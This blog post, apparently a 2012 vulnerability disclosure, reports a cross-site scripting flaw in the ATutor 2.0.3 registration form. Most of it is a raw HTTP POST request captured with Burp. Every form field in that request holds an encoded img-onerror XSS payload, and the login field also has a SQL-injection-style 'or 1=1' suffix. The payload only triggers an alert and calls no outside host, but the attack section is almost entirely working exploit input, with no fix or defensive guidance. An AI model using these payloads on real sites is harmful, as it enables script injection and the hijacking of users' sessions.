Thursday, 26 April 2012
[EN] ATutor 2.0.3 XSS
[ TITLE ....... ][ ATutor 2.0.3 XSS
[ DATE ........ ][ 14.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://
[ VERSION ..... ][
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [
[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...
[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)
[--------------------------------------------[
[ 2. What is the type of vulnerability?
[--------------------------------------------[
[ 3. Where is bug :)
................
hard copied from burp:
POST /www/NEW/atutor/ATutor/registration.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://localhost/www/NEW/atutor/ATutor/registration.php?register=Register
Cookie: ATutorID=ggobghtrr9dlt3d2qrsrjeej86; ea630b8e07331dfe8176df9908b196be=en-GB; PHPSESSID=rcqn6f0825bopcnfuthkb95la1; docebo_installer=qkel6srpbe1r44falthfgbloi7; docebo_session=au1hlm6k0dj1t72lvl88pdqt31; d5ff290df9b8ab6a17548bbbc48d21bc=903fb97e17f9a31fea5f97ee76a591bf
Content-Type: application/x-www-form-urlencoded
Content-Length: 1605
Connection: close
ml="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&password_error="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&form_password_hidden=923956e1de909d796933df77360069ceaa3df747®istration_token=04bfd37055f6b1b81319dbc326165a78af8a2ba0&login="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e%2F**%2For%2F**%2F1%3D%271%27&form_password1="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&form_password2="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&email="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&private_email="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&email2="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&first_name="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&second_name="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&last_name="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&year="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&month="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&day="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&gender="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&address="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&postal="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&city="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&province="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&country="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&phone="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&website="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&submit=+Save+
.........
[--------------------------------------------[
[ 4. More...
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment
What do You think...?